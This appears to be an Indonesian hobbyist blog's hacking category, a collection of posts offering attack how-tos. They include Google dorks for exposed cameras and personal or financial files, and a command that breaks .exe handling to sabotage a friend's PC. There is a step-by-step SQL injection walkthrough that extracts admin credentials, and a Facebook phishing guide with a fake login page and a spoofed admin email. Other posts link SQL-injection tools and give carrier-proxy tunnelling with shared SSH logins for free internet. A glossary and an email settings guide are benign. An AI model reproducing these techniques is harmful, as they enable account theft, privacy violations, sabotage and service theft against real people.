[Fs4] Fillestar4

4 out of 5 dentists recommend this WordPress.com site

Kategori: Hacking

Cara Hacking Menggunakan Google

Google melayani hampir 80 persen dari semua permintaan pencarian di Internet, membuktikan dirinya sebagai mesin pencari paling populer. Namun Google memungkinkan untuk mencapai bukan hanya sumber informasi publik yang tersedia, tetapi juga memberikan akses ke beberapa informasi yang paling rahasia yang seharusnya tidak pernah terungkap.

Dalam posting ini saya akan menunjukkan cara menggunakan Google untuk mengeksploitasi kerentanan keamanan dalam website. Berikut ini adalah beberapa hack yang dapat dicapai menggunakan Google.

1. Hacking Kamera Security

Masukkan query berikut dalam pencarian google

inurl:”viewerframe?mode=motion”

Klik pada salah satu hasil pencarian (Top 5 direkomendasikan) dan sobat akan mendapatkan akses ke kamera yang hidup yang memiliki kontrol penuh.

Klik pada salah satu hasil pencarian untuk mengakses kamera yang berbeda. Dengan demikian sobat memiliki Hacking Kamera Security menggunakan Google.

2. Hacking Dokumen Rahasia Pribadi

Menggunakan Google adalah sangat mungkin untuk mendapatkan akses ke repositori email berisi CV dari ratusan orang yang diciptakan ketika melamar pekerjaan mereka. Dokumen-dokumen yang berisi Alamat mereka, Telepon, DOB, Pendidikan, Pengalaman kerja dll dapat ditemukan hanya dalam hitungan detik.

Untuk melakukannya ketik permintaan pencarian berikut dan tekan enter.

intitle: “curriculum vitae” “telepon * * *” “alamat *” “e-mail”

Anda dapat mendapatkan akses ke daftar xls (excel dokumen). Yang berisi rincian kontak termasuk alamat email kelompok besar orang. Untuk melakukannya ketik permintaan pencarian berikut dan tekan enter.

filetype: xls inurl: “email.xls”

Juga mungkin untuk mendapatkan akses ke dokumen yang berpotensi mengandung informasi tentang rekening bank, ringkasan keuangan dan nomor kartu kredit menggunakan permintaan pencarian berikut

intitle: index.of finances.xls

3. Hacking Untuk Mendapatkan Barang Secara Gratis

Pernah sobat bertanya-tanya kepada Google bagaimana untuk mencari musik gratis atau ebooks. Nah di sini adalah cara untuk melakukan itu. Untuk men-download musik gratis cukup masukkan query berikut pada kotak pencarian google dan tekan enter.

“?intitle:index.of?mp3 eminem“

Sekarang Anda akan mendapatkan akses ke seluruh indeks album eminem dimana Anda dapat men-download lagu-lagu pilihan Anda. Untuk mencari ebooks yang harus Anda lakukan adalah mengganti “eminem” dengan nama buku favorit Anda. Juga mengganti “mp3” dengan “pdf” atau “zip” atau “rar

Unlock Them All – Software Untuk Membobol Proteksi Warnet

Bagi Kalian yang suka ke warnet pasti tahu dengan Winlock. Apaan itu Winlock?? Itu lho software yang dipasang untuk membatasi akses kita pada komputer warnet tersebut agar kita tidak bisa menginstall program, tidak bisa klik kanan, tidak bisa membuka Control Panel, Task Manager, Run, dan lainnya ^_^

Lalu apakah solusi untuk mengatasi proteksi Winlock tersebut? Gampang, kalian hanya perlu satu software saja yaitu “Unlock Them All”. Aplikasi ini merupakan kebalikan dari Cilok ehhh salah Winlock maksudnya, jadi kita bisa membuka semua proteksi yang dibuat oleh Winlock.

Penggunaannya pun sangat mudah, kalian tinggal menghilangi semua centangan kemudian klik Change (Apply), maka semua akan terbuka layaknya menjadi komputer anda sendiri. Silahkan mengakali warnet sesuka kalian, tapi jangan terlalu sering Gan .. kasihan juga yang punya warnet hehehehe, gunakan saja saat kalian sedang kepepet dan sangat membutuhkannya, OK! Langsung ke TKP aja ya Gan ^_^

Silahkan kalian Sedot…………dot…dottt ^_^
[92Kb]
Password : Fillestar4

Cara Merusak Sytem Operasi dalam 10 detik

Cara ini boleh kalian pake kalo misalkan lagi jengkel sama temen atau apalah, asal jangan buat kejahatan ya. . . ^_^

Langsung aja,

1. Buka command prompt (START=>RUN=>CMD=>ENTER)
2. Ketik ‘ASSOC.EXE=terserah’ (tanpa tanda kutip)
3. Enter!

…..wuihhhh
Semua file yang berekstensi .exe tidak akan dapat dibuka karena windows mengenalinya dengan ekstensi .terserah
hahahaaaaa

Dan bila laptop/komputer sobat sendiri yang kena jail jangan kuatir 😉

Cara mengembalikanny :
1. Jalankan komputer dengan ‘safe mode with command prompt’ (karena command prompt merupakan file windows yang juga berekrtensi .exe jadi tdak akan dapat dibuka normal [saat booting, tekan F8, dan pilih ‘SAVE MODE WITH COMMAND PROMPT])
2. Ketikkan perintah ‘ASSOC.EXE=exefile’ (tanpa tanda kutip)
3. Enter!
4. Restart

dan hasilnya komputer akan kembali normal seperti biasa. . .
selamat mencoba!

*kerusakan ataupun penyalahgunaan bukan tanggung jawab penulis.

Cara mencari kelemahan website/situs

Dengan begitu berkembangnya internet dewasa ini, situs web yang bermunculan tiap hari, begitu pula dengan virus dll. Bagi yang hobby mengutak atik website tentunya tidak asing lagi dengan istilah security untuk website/situs, mulai dari istilah sql injections dan lain sebagainya.

Kali ini saya akan berbagi tools untuk menguji dan mencari kelemahan website/situs, WebCruiser Web Vulnerability Scanner Enterprise v2.5.0, adalah sebuah perangkat lunak yang khusus dirancang untuk tujuan ini.

WebCruiser Web Vulnerability Scanner adalah sebuah perangkat lunak penetrasi web yang efektif dan kuat yang akan membantu kita dalam mengaudit website/situs, juga memiliki scanner kerentanan dan sengkaian alat keamanan.

Mendukung pemindaian situs POC (Proof of concept) kerentanan situs seperti: SQL Injection, Cross Site Scripting, XPath Injection dll. juga, WebCruiser juga adalah sebuah alat SQL injection otomatis, XPath injection tool, dan Cross Site Scripting tool!

Apa itu WebCruiser?, WebCruiser adalah alat untuk:

SQL Injection Tool pertama untuk Windows 7, Windows Vista
Web Vulnerability Scanner
SQL Injection Scanner
Cross Site Scripting Scanner
XPath Injection Scanner
Automatic SQL Injection Tool (POC)
Cross Site Scripting Tool (POC)
XPath Injection Tool (POC)
Post Data Resend Tool

Fitur Webcruiser:

Crawler(Site Directori dan File)
Vulnerability Scanner: SQL Injection, Cross Site Scripting, XPath Injection dll.
SQL Injection Scanner
SQL Injection Tool: GET/Post/Cookie Injection POC(Proof of Concept)
SQL Injection for SQL Server: PlainText/Union/Blind Injection
SQL Injection for MySQL: PlainText/Union/Blind Injection
SQL Injection for Oracle: PlainText/Union/Blind/CrossSite Injection
SQL Injection for DB2: Union/Blind Injection
SQL Injection for Access: Union/Blind Injection
Post Data Resend
Cross Site Scripting Scanner and POC
XPath Injection Scanner and POC
Auto Get Cookie From Web Browser For Authentication
Report Output.

Download WebCruiser Web Vulnerability Scanner Enterprise v2.5.0 [212 Kb]

Hacking Web Dengan SQL Injection

Harap dicatat bahwa penulis tidak bertanggung jawab atas segala bentuk efek dari artikel ini, tujuannya hanya untuk pengetahuan saja, jadi silahkan gunakan untuk kebaikan dan keamanan kalian masing2. Pertanyaan yang bersifat “Merusak” tidak akan ditanggapi. Cara ngehacking web atau biasa disebut web attack sangat banyak caranya, salah satunya dengan cara SQL injection.

Apa itu SQL injection ?
SQL injection terjadi ketika attacker bisa meng-insert beberapa SQL statement ke ‘query’ dengan cara manipulasi data input ke applikasi tsb.
ini salah satu cara melakukan tekhnik SQL injection, cara ini saya copas dari http://jasakom.com oleh seorang penulis sebut saja cruz3N
oke, mari kita simak bersama-sama.

1. Pertama kali yang kita lakukan tentu mencari target. Misalnya target kita kali ini adalah

http://www.target.com/berita.php?id=100
 

2. Tambahkan karakter ‘ pada akhir url atau menambahkan karakter “-” untuk melihat apakah ada pesan error.
Contoh :

http://www.target.com/berita.php?id=100'

atau

http://www.target.com/berita.php?id=-100
 

4. Maka akan muncul pesan error…
“You have an error in your SQL syntax.You have an error in your SQL syntax; check the
manual that corresponds to your MySQL server version for the right syntax to use near ”’
at line 1″ Dan masih banyak lagi macamnya.

5. Next step adalah mencari dan menghitung jumlah table yang ada dalam databasenya…
Disini kita akan menggunakan perintah order by
Contoh :

http://www.target.com/berita.php?id=100+order+by+1/*

Hohoho…apalagi itu “/*” ? Itu adalah karakter penutup perintah SQL atau kita juga bisa pake “–”. Terserah aja…
Kalo “+” sebagai penghubung perintah…

6. Nah sampe sini langsung dah nyobain satu2…

http://www.target.com/berita.php?id=100+order+by+1/* (gak ada error)
http://www.target.com/berita.php?id=100+order+by+2/* (gak ada juga)
http://www.target.com/berita.php?id=100+order+by+3/* (capek dah)
http://www.target.com/berita.php?id=100+order+by+4/* (jangan nyerah)

Sampai muncul error…
Misalkan errornya disini…

http://www.target.com/berita.php?id=100+order+by+10/*

Berarti yang kita ambil adalah “9″

http://www.target.com/berita.php?id=100+order+by+9/*
 

7. Untuk mengetahui berapa angka yang show sekarang kita pake UNION
Contoh :

http://www.target.com/news.php?id=100+union+select+1,2,3,4,5,6,7,8,9/*

Trus perhatikan angka berapa yang kelua

8. Misalnya angka hoki yang keluar adalah “3″ maka yang bisa akan kita lakukan adalah mengecek versi berapa mysql yang dipake dengan perintah “version()” atau “@@version”

http://www.target.com/news.php?id=100+union+select+1,2,version(),4,5,6,7,8,9/*

Atau

http://www.target.com/news.php?id=100+union+select+1,2,@@version,4,5,6,7,8,9/*
 

9. Nah kalo versinya 5 langsung aja pake perintah “information_schema” untuk melihat tabel dan kolom yang ada pada database…
Contoh :

http://www.target.com/berita.php?id=100+union+select+1,2,table_name,4,5,6,7,8,9+from+information_schema.tables/*

Nah katanya kalo untuk melihat tabel-tabel yang lain kita tambahkan LIMIT pada akhir URL. Tapi waktu itu gua gak pake keliatan kok tabelnya…Apa gua salah? Mungkin tapi sekarang yang gua mau jelaskan adalah VERSI DAN PENGALAMAN GUA. Mungkin agak lain…ya maklum lah baru belajar…Hehehe…

Misalnya yang lo liat adalah table “admin”
Nah sekarang kita liat-liat dulu kolomnya dengan mengganti aja kata “table”-nya…
Contoh:

http://www.target.com/berita.php?id=100+union+select+1,2,column_name,4,5,6,7,8,9+from+information_schema.colums/*

Misalnya kolom yang keluar adalah “password” dan “username”
Langsung aja kita liat isinya…
Contoh :

http://www.target.com/news.php?id=100+union+select+1,username,3,4,5,6,7,8,9+from+admin/*

dan

http://www.target.com/news.php?id=100+union+select+1,password,3,4,5,6,7,8,9+from+admin/*

Bisa diliat dah username ama passwordnya…Tinggal login…Cari yang asik terus…Terserah Anda…
—————————————————
begitulah yang dituliskan disana.
anda masih belum paham tentang apa SQL injection ?
tenang silahkan anda download file dokumen dibawah ini tentang SQL injection step by step.

Download SQL injection step by step.DOC 

oke selamat mencoba. yang terpenting jangan dilakukan di web teman anda ataupun di website Lokal.
referensi :
http://jasakom.com
http://ezine.echo.or.id
http://cruzenaldo.co.cc
http://students.ee.itb.ac.id
Catatan: Cara otomatis dengan memakai software bisa juga dilakukan, selengkapnya lihat artikel berikut ini
Atau mau mencoba tool yang baru saya dapatkan? namanya Havij. Adapun fitur2nya:

  1. Supported Databases with injection methods:
    • MsSQL 2000/2005 with error
    • MsSQL 2000/2005 no error (union based)
    • MySQL (union based)
    • MySQL Blind
    • MySQL error based
    • Oracle (union based)
    • MsAccess (union based)
  2. Automatic database detection
  3. Automatic type detection (string or integer)
  4. Automatic keyword detection (finding difference between the positive and negative response)
  5. Trying different injection syntaxes
  6. Proxy support
  7. Real time result
  8. Options for replacing space by /**/,+,… against IDS or filters
  9. Avoid using strings (magic_quotes similar filters bypass)
  10. Bypassing illegal union
  11. Full customizable http headers (like referer and user agent)
  12. Load cookie from site for authentication
  13. Guessing tables and columns in mysql<5 (also in blind) and MsAccess
  14. Fast getting tables and columns for mysql
  15. Multi thread Admin page finder
  16. Multi thread Online MD5 cracker
  17. Getting DBMS Informations
  18. Getting tables, columns and data
  19. Command executation (mssql only)
  20. Reading system files (mysql only)
  21. Insert/update/delete data

Download HAVIJ

 

Sumber Ide dari sini

CARA JEBOL AKUN FACEBOOK PALING AMPUH?

Question by Texas Holdem poker: CARA JEBOL AKUN FACEBOOK PALING AMPUH?
Malam ini TEXAS akan mengajak facebook’er untuk belajar hacking facebook. Namun tidak menggunakan application facebook freezer melainkan meng-hack facebook dengan fake login atau halaman login palsu untuk mendapatkan username dan password facebook si korban. Cara hack meng-hack ini sebenarnya merupakan cara jadul yang dilakukan para hacker. Tapi ampuh lho ! Penasaran ? Mau ?
Hacking facebook dengan fake login :
1. Buatlah akun dengan mendaftar di webhosting gratisan yang mendukung/assistance PHP. Seperti :
one. http://byethost.com/index.php/free of charge-hosting
2. http://www.ripway.com/
three. http://www.fileave.com/
Download SCRIPNYA DISINI http://www.ziddu.com/download/11538413/FakeLogin.rar.html
three. Extrak file tersebut dan simpan/upload di satu direktori di webhosting yang telah anda daftar, contoh http://NamaAnda.fileave.com/facebook/.
three file tersebut yaitu :
– Index.html
– logs.php
– logs.txt
four. Buatlah email palsu dengan memberikan embel-embel admin facebook tujuannya agar si korban percaya. contoh :
admin_facebook@yahoo.com / admin.facebook.gmail.com / admin.fb@plasa.com
5. Terus obtain isi pesan untuk electronic mail palsu DISINI http://www.ziddu.com/obtain/11538448/ScriptIsiEmailPalsu.doc.html
6. Buka isi file tersebut. Lalu ganti TULISAN yang berwarna merah dengan nama anda dan ganti alamat_e-mail_anda@gmail.com yang berwarna merah dengan alamat e-mail palsu anda. Terus pada URL :
http://www.facebook.com/n/?reqs.php&mid=883451G4a3b0e7eG88f1e5G2
Yang berwarna biru ganti dengan URL halaman fake login yang telah anda buat. contoh :
http://iamkrisna.fileave.com/index.html
7. Setelah semuanya anda edit, segera kirim isi pesan tersebut ke alamat email si korban .. Alamat email + password si korban akan datang sendirinya ke electronic mail palsu anda kalau si korban ketipu … hehehe
Greatest solution:
Solution by Crashblack
masih kurang ampuh gan….
klo cuma ngirim email aja pake email facebook mah bisa…
pake mailer aja…
dari e-mail admin@facebook.com langsung.. :D
itu fake login skrng sudah ketahuan..
jd skrng udah rumit.. :D

The best and most favorite hacking tools – free

Nmap creator conducted the survey for 100 best hacking tools against followers of nmap-hackers mailing list. Approximately 3.243 users to vote for their most favorite tools. The list of 100 favorite hacker tools can be found in http://www.insecured.org

From the 100 tools, The following are the 10 most favorite tools that gets the most votes. These tools are a weapon that’s considered absolutely necessary in hacking and security activities.
In the package contains the most necessary programs and utilities for the hackers ot crackers,

1. Cain and Abel [sniffer]
2. John the Ripper (powerful brootforce)
3. NetStumbler [allows to define radius of action of network WiFi – in real time for the diagram it is possible to see size of a useful signal]
4. Nmap[one of the best network scanner[
5. Putty [a quite good telnet the client]
6. SuperScan [powerful scanner TCP of ports, pinger and hostname resolver)
7. Hping (allows to generate special ICMP/UDP/TCP packages and to look through answers ping a host in style of the usual utility ping]
8. Lcp [audit and restoration of passwords ]
9. Nikto [perl the scanner broken Web a server, with support SSL]
10. Kismet [sniffer a wireless network 802.11 and the decoder of packages]

Download top 10 hacking tools
size: 23.66 MB
Passowrd : hacker.free-7.net

Kamus Hacker

1. Back Orifice: software buatan kelompok hacker
( Cult of the Dead Cow ) yang digunakan sebagai alat bantu untuk
menemukan jalan masuk ke sebuah komputer dan mengendalikannya dari
jarak jauh (remote). Versi terakhir yang muncul adalah Back Orifice
2000 yang mampu secara virtual mengendalikan sebuah komputer lain
dengan sistem operasi Windows. Untuk bisa menggunakannya hacker harus
melakukan langkah curang sedemikian rupa sehingga calon korban menerima
dan menjalankan Trojan horse (TH) dalam komputernya.TH ini lazimnya
diselipkan (attach file lewat email) dalam sebuah file yang tidak
berpenampilan jahat namun sebenarnya mengandung program Back Orifice
server tersembunyi di balik itu.
Kalau Back Orifice berhasil terinstall di komputer korban maka bisa
dipastikan hacker bisa melakukan banyak hal termasuk mengendalikan
(kontrol) komputer korban dari jauh. Dari hanya sekedar melihat,
menghapus, menambah file sampai merubah tampilan desktop bisa dilakukan
hacker pada komputer korbannya.

2. Black hat: kalau anda anggap www itu analogi
wild, wild west maka anda tentu sudah bisa menebak tentu black hat ini
ada di pihak yang jahat. Hacker black hat ini juga biasa
disebut sebagai aka crackers” dengan kemampuan mencuri data atau
merusak sistem yang ada dalam komputer korban. Kelebihan black hat
adalah kemampuannya untuk menghilangkan jejak hingga tidak bisa dilacak
siapa sebenarnya pelaku serangan yang terjadi setelah tujuan tertentu
mereka terpenuhi.

3. Buffer overflow: ini adalah sebuah kelemahan
yang mudah untuk ditemukan dan dimanfaatkan oleh hacker dalam sebuah
sistem. Aplikasi dan Operating System (OS) menyimpan untuk sementara
perintah yang mereka dapat di memori tertentu yang biasa disebut buffer
memory. Kalau OS atau program tidak bisa dikode secara sempurna maka
hacker bisa membuat komputer korban jadi terganggu dengan mengirimkan
perintah yang dibuat khusus yang membuat gangguan jadi berlangsung
lebih lama. Windows 95 paling rentan kalau sudah berhadapan dengan
serangan seperti buffer overflow yang banyak dilancarkan lewat internet
ini.
Saat ini serangan serupa sudah jarang dilancarkan pada sebuah komputer.
Namun terkadang hacker masih sering melakukannya untuk memperlambat
kinerja sebuah situs.

4. Denial-of-service attack : adalah sebuah istilah
yang diberikan untuk upaya serangan dengan jalan menurunkan kinerja
sebuah web site dengan terus menerus mengulang request ke server dari
banyak sumber secara simultan. Serangan seperti ini bertujuan membuat
server korban jadi kuwalahan melayani request yang terkirim dan
berakhir dengan menghentikan aktivitas atau berhenti dengan sendirinya
karena tak mampu melayani request.

5. Distributed denial-of-service attack (DdoS): di
masa lalu hacker hanya bisa melancarkan serangan denial-of-service
attack dengan mengirimkan request dalam jumlah besar secara simultan
dan kontinyu dari sebuah komputer. Namun sekarang hacker bisa
mengirimkan serangan dari beberapa komputer yang diaktifkan secara
remote. Pada tahun 1998 sebuah kelompok hacker menciptakan program yang
memungkinkan seorang hacker mengirimkan sebuah perintah dalam jumlah
besar ke komputer korban yang lain agar bisa dikendalikan secara
remote. Setelah beberapa komputer korban ada dalam kendalinya, secara
bersamaan komputer korban tersebut dikoordinir untuk melancarkan
denial-of-service attack kepada korban lain yang menjadi target utama.
Layaknya zombie beberapa komputer yang menjadi korban sebelumnya
dikendalikan secara remote untuk melakukan request secara kontinyu dan
simultan ke komputer target utama. Serangan serupa DdoS ini sudah
terbukti berhasil melumpuhkan beberapa web server milik situs besar
kenamaan seperti Yahoo.com dan eTrade.com. Namun dengan sebuah software
pendeteksi dan pengalaman yang cukup admin jaringan di beberapa
jaringan besar sudah selayaknya mampu menangkal serangan seperti ini.

6. Exploit: ini merupakan sebuah ungkapan untuk
keberadaan sebuah celah keamanan dalam software yang berjalan di sebuah
komputer. Lewat exploit inilah peluang untuk melakukan serangan terbuka
bagi hacker.
Setiap software atau sistem operasi baru dirilis maka pada saat yang
sama genderang perang ditabuh untuk memberi komando pada hacker mulai
mencari kelemahannya. Setiap ada kelemahan baru ditemukan oleh para
hacker maka pengumuman akan segera tersebar lewat beberapa media yang
menjadi forum
komuniakasi mereka. Kebanyakan kabar tersebut akan disebarkan di
beberapa mailing list seperti CERT, BugTraq, Microsoft’s security
bulletins dan beberapa lagi lainnya. Dengan disebarkannya penemuan
tersebut pembuat software bisa mengupayakan penangkalnya. Pemakai juga
bisa jadi lebih waspada akan terjadinya serangan. Dalam kebanyakan
kasus yang terjadi biasanya pemakai software kurang waspada akan
kelemahan software yang dipakainya padahal kabar sudah disebar dan
penangkal sudah bisa didapat.

7. Firewall: adalah sebuah software program yang
dipasang pada sebuah jaringan dan bertugas menjadi penghalang bobolnya
akses untuk kepentingan jahat layaknya sebuah saringan. Semua aktivitas
keluar dan masuk ke jaringan harus melalui penyaringan ini hingga akses
tertentu yang berbahaya bisa dibatasi. Saringan ini juga bisa digunakan
untuk mencegah adanya pencurian data berharga dari dalam jaringan oleh
pihak lain dari luar jaringan.bisa digunakan untuk mencegah adanya
pencurian data berharga dari dalam jaringan oleh pihak lain dari luar
jaringan.

8. Hacktivism: adalah aktivitas penyerangan oleh
hacker yang dimotivasi oleh simpati tertentu. Hal semacam ini muncul
bila aktivis sosial maupun politik menggabungkan kemampuan menyerang
yang dimiliki dan menggunakannya untuk kepentingan menarik simpati
lebih besar atau unjuk rasa lewat internet.

9. Intrusion detection system (IDS): sama seperti
firewall IDS ini merupakan penghambat semua niat jahat yang akan
megganggu sebuah jaringan. Bedanya IDS ini lebih mau selangkah dengan
kemampuannya memberi peringatan kepada admin server saat terjadi sebuah
aktivitas tertentu yang tidak diinginkan admin sebagai penanggung
jawab. Selainmemberi peringatan dini IDS juga memberi beberapa alat
bantu untuk melacak jenis dan sumber aktivitas terlarang tersebut.

10. Root: istilah ini diadaptasi dari sitem UNIX
dimana seorang pengguna bisa memiliki hak pengendalian terbatas pada
sebuah sistem. Hacker menggunakan istilah ini untuk menggambarkan
kemampuan mereka dalam melancarkan serangan dan menguasai sistem
korbannya.

11. Script kiddie: sebuah pola serangan yang sering
dilancarkan oleh hacker pemula dengan menggunakan alat bantu ringan
yang bisa mereka dapatkan di banyak situs hacker lainnya. Alat bantu
yang biasanya berisi sederetan skrip sederhana ini mereka gunakan untuk
mendeface atau melancarkan DOS pada korban yang memiliki expolit.
Hacker dengan jam terbang yang lebih tinggi biasanya mencibir hacker
permula yang menggunakan metode ini karena biasanya mereka hanya
menggunakan tanpa tahu teknologi dan konsep yang ada di balik pola
serangan yang dilancarkan.

12. Trojan horse: adalah sebuah aplikasi yang
didesain untuk melakukan sebuah kecurangan namun terselubung dengan
kebaikkan. Biasanya metoda yang dipakai adalah dengan menyelipkan
(attach file lewat email) sebuah file tertentu yang mengandung trojan
horse namun dengan kemasan menarik. Kalau trojan horse berhasil
menginfeksi maka bisa dipastikan hacker bisa mendapat akses tak
terhingga ke komputer korban. Tiga jenis trojan horse yang popular
digunakan adalah Back Orifice, NetBus, dan SubSeven.

13. White hat: hacker dengan kategori ini cenderung
lebih memanfaatkan pengetahuan mereka untuk memuaskan rasa ingin tahu
bagi intelektualita ketimbang untuk perbuatan jahat yang merusak.
Hacker seperti ini sangat nanti dengan perusakan sebuah sistem,
pencurian data mauoun merusak kinerja sebuah situs. Namun aktivitas
mereka tetap saja menjadi tidak legal bila mereka ingin menguji sebuah
sistem milik orang lain yang dimana mereka tidak memiliki otoritas
untuk itu. Dalam aktivitasnya tidak jarang mereka melakukan perusakan
yang tidak disengaja seperti merubah atau menghapus data yang ada.
Kebanyakan hacker seperti ini bekerja secara resmi diperusahaan
tertentu sebagai programer, konsultan maupun admin server.

Setting EMail otomatis menggunakan POP3/SMTP yahoo.co.id, gmail.com dan email pribadi

Meski belum bisa saingi SMS, Email semakin populer saja akhir2 ini. Padahal jika di hitung2, fasilitas yang mengandalkan Internet ini boleh jadi lebih murah. Mungkin karena email dianggap kurang praktis oleh sebagian orang, sedangkan SMS langsung diterima oleh penerima apabila ponsel nya aktif.

Itu sih cerita dulu, sekarang sudah ada fasilitas Push Mail. Jika ada pesan baru, akan langsung masuk ke ponsel dengan layaknya layanan SMS. Umumnya operator GSM di Indonesia sudah memiliki layanan ini.

Cukup dengan membayar iuran bulanan untuk menggunakan layanan ini.

Namun bagi kamu yang menggunakan email di GMail.com, Yahoo.co.id dan email perusahaan / pribadi kamu bisa menggunakan fasilitas ini dengan gratis, dengan catatan email yang kamu gunakan mendukung layanan POP3/SMTP dan Ponsel yang kamu gunakan mendukung Email services.

Ada beberapa setting / configurasi khusus yang harus dilakukan agar kamu dapat menggunakan fasilitas ini.

Berikut ini adalah setting / configurasi yang harus dilakukan:

GMail.com
Sebagai contoh:
Email: [email]user@gmail.com[/email]
Password : 123456

maka setting nya adalah sebagai berikut:
Mailbox name: Gmail
Akses point : Pilih sesuai dengan operator yang kamu gunakan (misal: TELKOMSEL)
Alamat email : [email]user@gmail.com[/email]
Username : [email]user@gmail.com[/email]
Password : 123456
Outgoing Mail server : smtp.gmail.com
Incoming Mail server : pop.gmail.com
Mailbox type : POP3
Incoming Port : 995
Outgoing Port : 465
SSL : ON
Authentication : On

Yahoo.co.id
Sebagai contoh:
Email: [email]user@yahoo.co.id[/email]
Password : 123456

maka setting nya adalah sebagai berikut:
Mailbox name: Yahoo
Akses point : Pilih sesuai dengan operator yang kamu gunakan (misal: TELKOMSEL)
Alamat email : [email]user@yahoo.co.id[/email]
Username : user
Password : 123456
Outgoing Mail server : smtp.mail.yahoo.co.id
Incoming Mail server : pop.mail.yahoo.co.id
Mailbox type : POP3
Incoming Port : 995
Outgoing Port : 465
SSL : ON
Authentication : On

Email perusahaan / pribadi
Hargaponsel.info
Sebagai contoh:
Email: [email]user@hargaponsel.info[/email]
Password : 123456

maka setting nya adalah sebagai berikut:
Mailbox name: Hargaponsel
Akses point : Pilih sesuai dengan operator yang kamu gunakan (misal: TELKOMSEL)
Alamat email : [email]user@hargaponsel.info[/email]
Username : [email]user@hargaponsel.info[/email]
Password : 123456
Outgoing Mail server : mail.hargaponsel.info
Incoming Mail server : mail.hargaponsel.info
Mailbox type : POP3
Incoming Port : 110
Outgoing Port : 25
SSL : OFF
Authentication : On

Setting diatas berlaku secara umum dan untuk semua jenis ponsel. Jadi hanya perlu disesuaikan saja dengan jenis / type ponsel kamu. Jika menggunakan email perusahaan / pribadi, silahkan tanyakan langsung ke pada IT / tempat kamu hosting mengenai Incoming Mail Server dan Outgoing Mail Server.

Semoga bermanfaat buat temen2 semua yang membaca tulisan saya.

Salam hangat,

Trik Internet gratis cdma SMART

Pada bulan april lalu aku beli hp smart yang gratis internet selama 6 bulan per bulan dapat akses data 2Gb, tapi berhubung sekarang udah bulan november yaa gratisannya udah habis. Aku coba pake pulsa, wah ternyata boros banget, nyedotnya g karuan habisin pulsa..Namun jika pake wap ya lumayan murah. Tapi tampilannya kurang memuaskan kalo pake wap, soalnya udah terbiasa connect ke PC

Iseng-iseng search di mbah google cara trik internet gratis cdma smart, nemu banyak tutorialnya dan udah aku coba semuanya tapi tidak ada yang berhasil. Apa yang ada di tutorial itu masih berlaku atau sudah tidak bisa lagi ya??atau mungkin aku yang tidak bisa cara settingnya??? Berikut beberapa telah aku coba dan tidak berhasil. hiks hiks hiks hiks

TRIK INTERNET GRATIS SMART
Cara-cara internet gratis.
Sebenarnya hanya dengan mengunakan proxi 10.17.27.250:8080 kamu bisa mendapat koneksi internet dengan maksimal

Gratisan Smart (Alternatif)
Meski internet gratis esia sudah tidak jalan, namun bagi cdma user masih ada pilihan lain untuk bisa menggunakan akses internet Gratis. Salah satunya adalah internet gratis smart dengan menggunakan proxy 10.17.27.250:8080. Sebenernya, untuk bisa mendapat koneksi maksimal, kita ga perlu repot-repot, cukup memodifikasi sedikit dari trik internet gratis esia yg sudah pernah dibahas, bisa ngacir bebas hambatan.
Pertama, dial smart-mu
Kedua, buka PuTTY lalu set proxy 10.17.27.250:8080 pada tab proxy. lalu pada bagian ssh pilih tunnel dan masukkan source port sesuai keinginan dan centang “dynamic”nya.
ketiga, masukkan IP free ssh account yg telah di share sebelumnya pada bagian hostname, lalu masukkan port ssh nya dengan port 80.
keempat, jalankan ssh tunnel lewat PuTTY kemudian buka proxifier dan set socks proxy hasil dari ssh tunnel disana.
kelima, restart proxifier DAN SELAMAT MEIKMATI…!

Alternatif lainnya:
Berikut langkah-langkah untuk menikmati berbagi Trik Internet Gratis CDMA Smart:

1. Cari lalu download software MyEnTunnel
2. Setting MyEnTunnel :

SSH Server : 68.178.172.19
SSH Port : 80 (ini sudah tetap)
Username : anjing
Pass : buduk

atau

SSH Server : 72.55.165.86
SSH Port : 8080
Username : internetuntuksemua
Pass : free4u

3. Centang :

– Reconnect on Failure
– Use Private Key
– Verbose Logging
– Enable Slow Polling
– Infinite Retry Attempts
– Enable Dyanamic SOCKS Port 80 (ini yang bisa kita rubah-rubah jadi 20 dsb)
– Hide Port Connections
– Enable Compression
– Retry Delay 1
– Disable Notifications
Pilihan Port lainnya : 20, 443,554,3124,3127, 7999,8000,8088,8888 and 9201

4. Browser Settings :
yang diisi cuma SOCKS dengan localhost port 80
5. Dial Up Settings :
paling cocok untuk SMART (lalu ESIA)
SMART username cdma pass cdma #777
ESIA username esia pass esia #777
silahkan dicoba Berbagi Trik Internet Gratis CDMA Smart.